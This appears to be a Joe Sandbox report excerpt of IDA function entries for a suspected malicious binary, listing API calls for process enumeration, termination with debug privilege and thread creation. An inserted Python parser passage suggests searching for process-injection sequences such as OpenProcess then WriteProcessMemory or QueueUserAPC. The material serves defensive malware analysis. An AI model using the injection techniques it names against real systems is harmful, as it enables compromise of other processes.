• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
• String ID:
• API String ID: 1241431887-3916222277
• Opcode ID: ef941778afa8c29c50a5af396a3a2543f522ce47a9151f11951977a0fddcf6ba
• Instruction ID: 13e6edb767790a08f5ea73702208ff9a6887f7c9f69ffa9188971e340d5a2ae2
• Opcode Fuzzy Hash: ef941778afa8c29c50a5af396a3a2543f522ce47a9151f11951977a0fddcf6ba
• Instruction Fuzzy Hash: 2B4181B5901209BFEB059F90CC85FFB7BACFF49758F004016FA059A181D7B4AD84ABA4

APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,?,00F5DC00), ref: 00F1B715
• FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00F5DC00), ref: 00F1B749
• QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00F1B8C1
• SysFreeString.OLEAUT32(?), ref: 00F1B8EB
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 560350794-0
APIs
• _memset.LIBCMT ref: 00F224F5
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F22688
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F226AC
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F226EC
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F2270E
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F2286F
• GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00F228A1
• CloseHandle.KERNEL32(?), ref: 00F228D0
• CloseHandle.KERNEL32(?), ref: 00F22947
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
• String ID:
• API String ID: 4090791747-0
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00F2B3F4
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
APIs
• LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00F3DB1B
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F3DB3C
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00F3DB51
• ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00F3DB6E
• SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00F3DB95
• DestroyIcon.USER32(00000000,?,?,?,?,?,?,00EDA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00F3DBA0
• SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00F3DBBD
• DestroyIcon.USER32(00000000,?,?,?,?,?,?,00EDA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00F3DBC8
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Icon$DestroyExtractImageLoadMessageSend
• String ID:
• API String ID: 1268354404-0
APIs
  • Part of subcall function 00F06EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F05FA6,?), ref: 00F06ED8
  • Part of subcall function 00F06EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F05FA6,?), ref: 00F06EF1
  • Part of subcall function 00F072CB: GetFileAttributesW.KERNEL32(?,00F06019), ref: 00F072CC
• lstrcmpiW.KERNEL32(?,?), ref: 00F075CA
• _wcscmp.LIBCMT ref: 00F075E2
• MoveFileW.KERNEL32(?,?), ref: 00F075FB
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 793581249-0
                                                                                                                                                                                                                                                      • Opcode ID: b9e5212a14260273443cae34fc96686af540cab6d46721849a32f2ae5064fdc9
                                                                                                                                                                                                                                                      • Instruction ID: ee7ebe702c839036f99a29493cfd9825ac3682c4cfdc197fe401ad7e5b7ac6fb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b9e5212a14260273443cae34fc96686af540cab6d46721849a32f2ae5064fdc9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F51F1B2D0921D9ADF64EB94DC419DE73BC9F08320B5040DAFA05E3181DB75A6C5EF64
APIs
• ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00F3DAD1,00000004,00000000,00000000), ref: 00EDEAEB
• ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00F3DAD1,00000004,00000000,00000000), ref: 00EDEB32
• ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00F3DAD1,00000004,00000000,00000000), ref: 00F3DC86
• ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00F3DAD1,00000004,00000000,00000000), ref: 00F3DCF2
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: ShowWindow
• String ID:
• API String ID: 1268545403-0
• Opcode ID: e5ed94d9ee11b2f67257aa79b1d664837975ffd7690dc3127f707da91e927d97
• Instruction ID: 5e430b100e7c845bd43c02dbd875f1ecbaaaebada01cbe1310fc9a3bfeaa2c2f
• Opcode Fuzzy Hash: e5ed94d9ee11b2f67257aa79b1d664837975ffd7690dc3127f707da91e927d97
• Instruction Fuzzy Hash: 65412A70714680DAD73567289D8DB7A7A95FB53328F19340FF087AE761D670B842E311
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00EFAEF1,00000B00,?,?), ref: 00EFB26C
• HeapAlloc.KERNEL32(00000000,?,00EFAEF1,00000B00,?,?), ref: 00EFB273
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00EFAEF1,00000B00,?,?), ref: 00EFB288
• GetCurrentProcess.KERNEL32(?,00000000,?,00EFAEF1,00000B00,?,?), ref: 00EFB290
• DuplicateHandle.KERNEL32(00000000,?,00EFAEF1,00000B00,?,?), ref: 00EFB293
• GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00EFAEF1,00000B00,?,?), ref: 00EFB2A3
• GetCurrentProcess.KERNEL32(00EFAEF1,00000000,?,00EFAEF1,00000B00,?,?), ref: 00EFB2AB
• DuplicateHandle.KERNEL32(00000000,?,00EFAEF1,00000B00,?,?), ref: 00EFB2AE
• CreateThread.KERNEL32(00000000,00000000,00EFB2D4,00000000,00000000,00000000), ref: 00EFB2C8
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
• Opcode ID: 4d14197ad7c1178aef6da10cb4fd3147d1f98ea69f2767beb3e8dda73a483df3
• Instruction ID: e8f12226d04413496febb2c464c56e089c8466e6f4b8a34b3ec1d3c38eac9959
• Opcode Fuzzy Hash: 4d14197ad7c1178aef6da10cb4fd3147d1f98ea69f2767beb3e8dda73a483df3
• Instruction Fuzzy Hash: 8601C9B9240308BFE710AFA5DC4DF6B7BACEB99B11F018411FE05DB2A1CA749810DB61
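The "APIs" listings in these entries are a fixed text format (bullet, optional "Part of subcall function" prefix, `API.MODULE(args)`, `ref: <call-site address>`), which makes them easy to mine across a whole report. The following Python is an added example and not Joe Sandbox tooling: it parses that format, orders the calls by call-site address, checks for an ordered API pattern, and lists argument values that recur across unrelated calls. The sample input is constructed from the two entries above (the file-move entry and the thread-setup entry); the function names and the dictionary keys `thread_setup` and `file_move` are my own. One caveat the parser makes visible: the argument lists are raw stack dwords at the call site, not decoded parameters (GetCurrentProcess takes no arguments yet nine values are listed), so a value such as `00EFAEF1` that recurs in almost every call is most likely a saved return address rather than a handle or pointer passed to the API.

```python
import re
from collections import Counter

# Constructed sample input: the "APIs" lines of two function entries copied from
# the report above. The trailing "ref:" value is the call-site address.
SAMPLE_ENTRIES = {
    "thread_setup": """\
• GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00EFAEF1,00000B00,?,?), ref: 00EFB26C
• HeapAlloc.KERNEL32(00000000,?,00EFAEF1,00000B00,?,?), ref: 00EFB273
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00EFAEF1,00000B00,?,?), ref: 00EFB288
• GetCurrentProcess.KERNEL32(?,00000000,?,00EFAEF1,00000B00,?,?), ref: 00EFB290
• DuplicateHandle.KERNEL32(00000000,?,00EFAEF1,00000B00,?,?), ref: 00EFB293
• GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00EFAEF1,00000B00,?,?), ref: 00EFB2A3
• GetCurrentProcess.KERNEL32(00EFAEF1,00000000,?,00EFAEF1,00000B00,?,?), ref: 00EFB2AB
• DuplicateHandle.KERNEL32(00000000,?,00EFAEF1,00000B00,?,?), ref: 00EFB2AE
• CreateThread.KERNEL32(00000000,00000000,00EFB2D4,00000000,00000000,00000000), ref: 00EFB2C8
""",
    "file_move": """\
• Part of subcall function 00F072CB: GetFileAttributesW.KERNEL32(?,00F06019), ref: 00F072CC
• lstrcmpiW.KERNEL32(?,?), ref: 00F075CA
• _wcscmp.LIBCMT ref: 00F075E2
• MoveFileW.KERNEL32(?,?), ref: 00F075FB
""",
}

# One API line. The argument list is optional (CRT calls such as _wcscmp.LIBCMT
# are printed without one) and so is the comma before "ref:".
API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<subcall>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][\w$]*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def parse_api_lines(text):
    """Parse one 'APIs' section into call records ordered by call-site address."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # headers, dump sources and hashes are not API lines
        raw_args = m.group("args")
        args = [a for a in raw_args.split(",") if a] if raw_args else []
        calls.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": args,
            "ref": int(m.group("ref"), 16),
            "subcall": m.group("subcall"),
        })
    calls.sort(key=lambda c: c["ref"])
    return calls


def call_sequence(calls):
    """API names in call-site order."""
    return [c["api"] for c in calls]


def contains_ordered(calls, pattern):
    """True if the names in `pattern` occur in that order, not necessarily adjacent."""
    it = iter(call_sequence(calls))
    return all(name in it for name in pattern)


def api_histogram(calls):
    """How often each API.MODULE pair is called; a cheap key for comparing functions."""
    return Counter(f"{c['api']}.{c['module']}" for c in calls)


def recurring_stack_values(calls, min_calls=3):
    """Non-zero 8-hex-digit values present in the argument list of at least
    `min_calls` distinct calls. Because the listed arguments are raw stack dwords,
    a value that recurs across unrelated APIs is usually a return address or a
    saved register rather than a real parameter."""
    seen = Counter()
    for c in calls:
        for v in set(c["args"]):
            if re.fullmatch(r"[0-9A-Fa-f]{8}", v) and v != "00000000":
                seen[v] += 1
    return {v: n for v, n in seen.items() if n >= min_calls}


if __name__ == "__main__":
    for name, text in SAMPLE_ENTRIES.items():
        calls = parse_api_lines(text)
        print(name, call_sequence(calls))
        print("  DuplicateHandle before CreateThread:",
              contains_ordered(calls, ["DuplicateHandle", "CreateThread"]))
        print("  recurring stack values:", recurring_stack_values(calls))
```

The ordered match is a triage aid, not a verdict: in the thread-setup entry each DuplicateHandle is preceded by two GetCurrentProcess calls, so the source and target process handles appear to be the current process and the entry looks like in-process thread setup (consistent with an AutoIt runtime) rather than the cross-process injection the report flags elsewhere. To locate the injection primitives, run the same parser over every entry in the report and search for sequences such as OpenProcess or NtOpenProcess followed by WriteProcessMemory, SetThreadContext or QueueUserAPC, which is what the report's "Maps a DLL or memory area into another process" and "Queues an APC in another process" signatures describe.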
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID:
• String ID: NULL Pointer assignment$Not an Object type
• API String ID: 0-572801152
• Opcode ID: 29f4ec2dd5c99683cc0bdfbf9a8d603dbb07a55424a3156d066a2136148f70d7
• Instruction ID: c5a70fe39b9405f4fb0fdf0b335c75e4ee5e74c8569d3b3ee9a8389eab80cf4f
• Opcode Fuzzy Hash: 29f4ec2dd5c99683cc0bdfbf9a8d603dbb07a55424a3156d066a2136148f70d7
• Instruction Fuzzy Hash: EDE1A271E40219ABDF14DFA4D881BEE77B5EF48364F148029E905AB281D770ED81EBD0
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Variant$ClearInit$_memset
• String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
• API String ID: 2862541840-625585964
• Opcode ID: b674143e89329aedca6ae89ea7db4c693f7286292ddf34d4655cbe3a62975137
• Instruction ID: f4069d2eb3058cdd4d5b87dba6974bcd66000590075a68feed68bde5a93672cf
• Opcode Fuzzy Hash: b674143e89329aedca6ae89ea7db4c693f7286292ddf34d4655cbe3a62975137
• Instruction Fuzzy Hash: 56918F71E00219EBDF24DFA5D844FEEBBB8EF85720F10815AF505AB291D7709981DBA0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00F29B19
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 00F29B2D
                                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00F29B47
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00F29BA2
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00F29BB9
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00F29BE7
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend$Window_wcscat
                                                                                                                                                                                                                                                      • String ID: SysListView32
                                                                                                                                                                                                                                                      • API String ID: 307300125-78025650
                                                                                                                                                                                                                                                      • Opcode ID: 2cf6377692894f73a0fd1a8990b82d720a6b3a132583e8e08ed86b279c513015
                                                                                                                                                                                                                                                      • Instruction ID: f46aac7e9680b069cc65f9f8db0578305218ea0da31dc8b7730425453d185562
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2cf6377692894f73a0fd1a8990b82d720a6b3a132583e8e08ed86b279c513015
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C841D371A04318ABDB219FA4DC85BEE77E8EF08350F10442AF589E7291D7B59D84EB60
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00F06532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00F06554
                                                                                                                                                                                                                                                        • Part of subcall function 00F06532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00F06564
                                                                                                                                                                                                                                                        • Part of subcall function 00F06532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00F065F9
                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F2179A
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00F217AD
                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F217D9
                                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F21855
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000), ref: 00F21860
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00F21895
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                      • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                      • API String ID: 2533919879-2896544425
                                                                                                                                                                                                                                                      • Opcode ID: fb7c3f245afcd3691dc16321a9e22544dd562e61ea124fc3dbcd416083fea2ce
                                                                                                                                                                                                                                                      • Instruction ID: 144844541926ff2960b1c35f29e224af33abd56ccc0099dbea4ad5cc365ef866
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fb7c3f245afcd3691dc16321a9e22544dd562e61ea124fc3dbcd416083fea2ce
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C41CE72600210AFDB15EF54DDE5FADB7A1BF64310F048059FA06AB2C2DB79A901AB91
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 00F058B8
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: IconLoad
                                                                                                                                                                                                                                                      • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                                      • API String ID: 2457776203-404129466
                                                                                                                                                                                                                                                      • Opcode ID: 298789f90147bc7db03c7483d2dc74b724e6eb035a40857092b684b708751543
                                                                                                                                                                                                                                                      • Instruction ID: 36e21d355ebfacbd5494f877697f22aa5421d1f3e6567727287c54d00d261dc0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 298789f90147bc7db03c7483d2dc74b724e6eb035a40857092b684b708751543
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC112E36B09746FAE7005A559C42D6B33DCDF15720B20403AFD00A52C1F7F09940BA65
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00F0A806
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
